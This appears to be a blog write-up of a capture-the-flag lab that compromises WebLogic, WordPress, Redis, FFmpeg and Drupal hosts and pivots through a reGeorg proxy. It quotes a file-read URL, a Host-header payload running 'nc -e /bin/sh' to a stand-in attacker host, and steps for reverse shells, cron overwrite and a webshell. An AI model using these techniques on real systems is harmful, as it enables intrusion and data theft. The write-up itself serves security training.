【Experiment description】
The operating system of the operating machine is kali. After entering the system, the default is the command line interface. Enter the startx command to open the graphical interface.
All the information and tools needed are placed in the /home/Hack directory.
The task of this experiment is to penetrate into the two hosts of the intranet through the proxy through the two hosts of the external network. During the penetration process, it is generally necessary to first scan the port to guess the services running on the host, and then further determine the existence of the vulnerability through vulnerability scripts and other scanning tools, so as to complete the host penetration and obtain permissions.
In this experiment, you need to find a string with the word flag{32-bit MD5} as a credential for completing the task, and put the flag into the form to submit it.
xxxxxxxxxx通过外网系统漏洞获取目标机器的权限通过获取服务器的权限后,通过此机器为跳板入侵内网
【Purpose of experiment】
xxxxxxxxxxWeblogic的java反序列漏洞应用Wordpress任意文件读取的漏洞利用Wordpress命令执行的漏洞利用WordPress通过自己修改的EXP,getshell通过代理扫描内网Redis未授权访问以及对配置文件的理解Ffmpeg任意文件的读取结合redis的利用Drupal由于YAML解析器处理不当导致远程代码执行
【Experimental Environment】
| Operating System | IP Address | Server Role | Login Account Password |
|---|---|---|---|
| Kali Linux | 192.168.2.10 | Operator | Username: root; Password: Simplexue123 |
| Centos 7 | 192.168.2.11 | Target machine | Username: root; Password: Simplexue123 |
| Centos 7 | 192.168.1.10 | Target machine | Username: root; Password: Simplexue123 |
| Centos 7 | 192.168.1.11 | Target machine | Username: root; Password: Simplexue123 |
| Centos 7 | 192.168.2.200 | Target machine | Username: root; Password: Simplexue123 |
Task 1, Weblogic deserialization
According to experimental prompts, access in kali's firefox browser192.168.2.10On port 7001, a 404 error was returned.
First, find out where the weblogic utilization tools provided by the experiment are, positioning, and/home/HackFind the exploitation tool for Weblogic deserialization vulnerability in the directory
At the same time, there are tools that need to be used in subsequent experiments under this folder
Use weblogic java deserialization to obtain permissions. After simple configuration, you can connect and successfully obtain shell capabilities. You have found that the account has root permissions
Find the string submission of flag characters in the home directory, which is shown in the screenshot above/homeThere is a directoryflagDirectory, directly read file content/home/flag/flag.txt flag6{f67ed0564c9d4055130237cdde2ad486}
Task 2: Read any file in Wordpress
First, you need to know the domain name of WordPress, and through the experimental environment provided by the experimental platform, you know that the target may be located in192.168.2.11, 192.168.1.10, 192.168.1.11, 192.168.2.200, After trying one by one, confirm the target host192.168.2.11A Wordpress website was built on it. usewpscanScan the website and found that it has a plug-in with a vulnerability -wp-hide-security-enhancer v1.3.9.1, the version of this plug-in is less than 1.3.9.2, and there is arbitrary file download vulnerability.
Go to the givenArbitrary File Download Vulnerability in WP Hide Security Enhancer 1.3.9.2 - SecuPressLink search method,
All an attacker need is 2 parameters in the URL as requested in line 8:
xxxxxxxxxxhttp://example.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=…&file_path=…Now, line 15 excepts an existing file. And an attacker knows an existing AND interesting file on your installation, which is
wp-config.php.
That is, by constructing a specific URL192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php, you can get the target web server/wp-config.phpdocument
Successfully read the target serverwp-config.phpand obtain the file from itflag4{358006170b5d31ff0523c1656df7b82e}。
Task 3, Wordpress command execution
Visit the target website, configure the proxy in the browser, and use Burpsuite to intercept the request package
Use the Burpsuite intercept function to intercept wordpress login requests and forward them to the repeater module
Use Burpsuite's repeater module to detect vulnerability fields.
According to the prompts,经过进一步的探测,判断这个wordpress中存在phpmailer的命令执行漏洞,这个漏洞的特点是通过HTTP包中的Host字段触发,唯一的前提条件是需要知道管理员的用户名。
Modify the Host in the request header in the repeater module, and return to the message by adding meaningless fieldslength: XXWhenever there is a change, every time 1 character is added, length is added 1. For details, it is found thatlength: XXThe size of the number is equal to the length of the Host request header
According to the experimental platform prompt理解wordpress mailer漏洞的原理,执行wp.sh 脚本获取响应信息, guess that there should be a wordpress mailer vulnerability in this system
Inquiry of relevant information, we can call the underlying layer in PHPMailermail()When (or sendmail) interface, the "mail-related fields" will be spliced into a shell command. PHPMailer should strictly filter user-controllable fields (such as Host, From addresses), but due to support for RFC standards andescapeshellargInappropriate combination of mechanisms, an attacker can construct a header or address with special characters (such as parentheses, semicolons, etc.), bypass the verification and be spelled into the sendmail command line as it is, and then execute any system commands.
WordPress is callingwp_mail()When the underlying PHPMailer will place certain email headers (includingHost, if injected through plug-in/theme or custom script) into a sendmail command line. If modified directly in HTTP requestHost:The value and contains "special characters + malicious commands", which can bypass normal verification of the address and domain name, and finally pass it to sendmail in the form of command parameters, thereby executing any shell code.
Most email headers (e.g.From:、Reply-To:) There are strict RFC filtering in PHPMailer, butHostThe header is often a field used to specify the host name of the mail server, and the filtering of it in the code is looser. It is precisely this that the attacker uses to make a constructed payload (e.g.victim.com)(;nc -e /bin/sh attacker 1337;)) Stuck inHostIn the head, you can "successfully" hand over that payload to the underlying sendmail for execution.
Trigger entry: Any callwp_mail(), or the scenario where the underlying PHPMailer is called using a third-party plug-in/theme may become an entry, including password reset (/wp-login.php?action=lostpassword), "Share to Friends" emails, comment notifications, Pingback/Trackback, contact form plug-in, etc.
Construct HTTP request: For example, for CVE-2016-10033, an attacker initiates a request to any page in WordPress 4.6 while forging in the HTTP headerHost: victim.com)(;恶意命令;), since Exim is an MTA and Apache allows the host by default, it is passed through PHPMailerisMailExecutes when delivered to sendmailRapid7。
It's understandable nowwp.shThe logic is that it splices malicious commands (bounce shells) into the Host field in the request header and issues a network request
Now modify the configuration in the script and letwp.shRebound192.168.2.11The wordpress server's shell to the machine used to attack192.168.2.10
implement./wp.shSuccessfully obtainedflag3{452755af28285ffd6615866f61bb23e6}
Task 4. Obtain command execution permissions through improved exploit scripts
Although I successfully obtained the flag in the previous task, I did not directly obtain the rebound shell
Observe improvement scriptswordpress-rce-exploit.sh,
line 3 - 17, inprep_host_header()The function (meaning it should be to prepare the request header) and pass the incoming command (such ascurl …or/bin/bash …) Do string processing, and finally wrap it into a payload that will be parsed and executed by Exim (mail transfer proxy), and put it on the HTTP requestHost:in advance. Finally constructed something like:Host: a(a -be ${run{…}} p)
The parameter verification of line21-25 means that this script must accept the address of a target machine.
line31-34 Construct and host the rebound shell script to write the rebound shell command to the filer. At the same time, use a simple HTTP server in Python to provide downloads to the outside world
line37-41 Inject the command to download and save payload into the target
usecurlTowards the targetwp-login.php?action=lostpasswordSend a POST request.
Due to the CVE-2016-10033 vulnerability, WordPress will place HTTP request headers (including malicious intentions)Host:) Spliced into the email header, Exim parses this part of the content when forwarding the email and executes the commands therein. Let the target server download the attacker hostedrFile to/tmp/r。
line 43-49 Trigger execution of rebound shell
Modifyrev_hostBefore you need to pay extra attention to a problem that occurs on the experimental platform, the operating machine marked in the experimental environment on the platform is Kali Linux192.168.2.10, but by using it in the machineifconfigThe IP I saw in the real intranet environment is192.168.2.200
Now after reconfiguring the correct IP and ports that accept shell rebound in the script, execute the nc command to listen to the configured ports, and then execute the improvement script. I observed that the rebound shell was successfully obtained./homeflag was successfully found in the subdirectory of
flag5{2591c98b70119fe624898b1e424b5e91}
Next, use the shell to upload the regeorg tunnel.php file and set up a proxy using regeorg
It was observed in the experiment that the rebound shell lasted for a short time, with only about 30 seconds of window period available for operation. I tried to persist a one-sentence Trojan, but it never worked. It was speculated that the security permissions of the server blocked the execution of malicious php code (such as eval). Finally, I took the network service on the attack machine through the SimpleHttpServer module, and successfully downloaded the regeorg tunnel.php file on the server.
Successfully uploadedtunnel.phpAfter the file, use regeorg to set up a proxy on the attack machine.
Set up the proxy of regeorg through proxychains (the ProxyChains configuration file is located in /etc/proxychains.conf) and use this proxy to scan the intranet 1.0 network segment using this proxy.
Task 5. Redis unauthorized access +ffmpeg any file read
Try the IP of other target machines and find192.168.1.11Provides the function of using ffmpeg to process videos, which can be used through/upload,/download,/delProcessing files
Using nmap to scan the port, we know that the maximum port number used by redis enterprise software is 9443, so there is no need to set the upper limit very large. Finally, the scan was successfully completed and the http service was opened on port 80 and redis was opened on port 6379.
Redis can be connected without a password. Through Redis's configuration file, we know that the configuration file storage path is/etc/redis/63799.conf
The task requires us to obtain the redis configuration file, please refer to the relevant onesgen_xbin_avi.pymaterial
FFmpeg任意文件读取漏洞分析_ffmpeg文件读取漏洞-CSDN博客
Just need to go through python scripts./gen_xbin_avi.py file://<filename> file_read.avi 生成恶意视频file_read.avi,另外注意这里命令行必须使用python3,默认python version is 2.7
Upload the malicious video to/uploadAPI, found that it might be warning information, change the file name to123.aviRe-upload, go to/downloadurl download to video456.avi, The content of this video is actually the content of the target file
You can see that there is a configuration in the configrename-command config "ccoonnffiigg"
It can be seen that the CONFIG command of the redis service is modified to "ccoonnffigg", and the target timing task cron file needs to be covered by the characteristics of redis writing files.
In this experimental platformredis.txtThe file gives a prompt, and after configuring the timing task, the rebound shell was successfully obtained.
The flags are successfully read with the help of the rebound shell, respectivelyflag1{7bed46c5c61c0ac625cebf8a9922cc48} flag2{86a1b907d54bf7010394bf316e183e67}
Task 6, Drupal8 remote code execution
Use the remaining ones in Task 4/tunnel.phpUse regeorg to set up a proxy, then use proxychains to start firefox access through the proxy192.168.1.10, enter a website built by Drupal framework
Weak password login to the target website background. Drupal does not have a default account and password, but the experimental platformdrupal_poc.txtAn interesting file path is given in the try to pass the username and passwordadmin adminLogin successfully
Use deserialization vulnerability to execute phpinfo to detect website information
In a risky url/admin/config/development/configuration/single/import, paste the poc given by the experimental platform. Click to import and successfully obtain the phpinfo website information.
Use the deserialization vulnerability to write to the webshell and test the existence. Paste the exp given by the experimental platform. It should exist in the website path afterwardsshell.phpFile (the root directory of the website is/var/www/html/drupal8/)
Use Cknife to set up a proxy to connect to the webshell to obtain the permissions of the website, directly connect to the Php Trojan to obtain the virtual terminal, and get the flag
flag8{d969246731846291b32cd819bf0e7ff6}
flag12{c2ce1971e3a10498a64da8c7f3a70091}
hello
回复删除scarletborder yyds
回复删除🥲
删除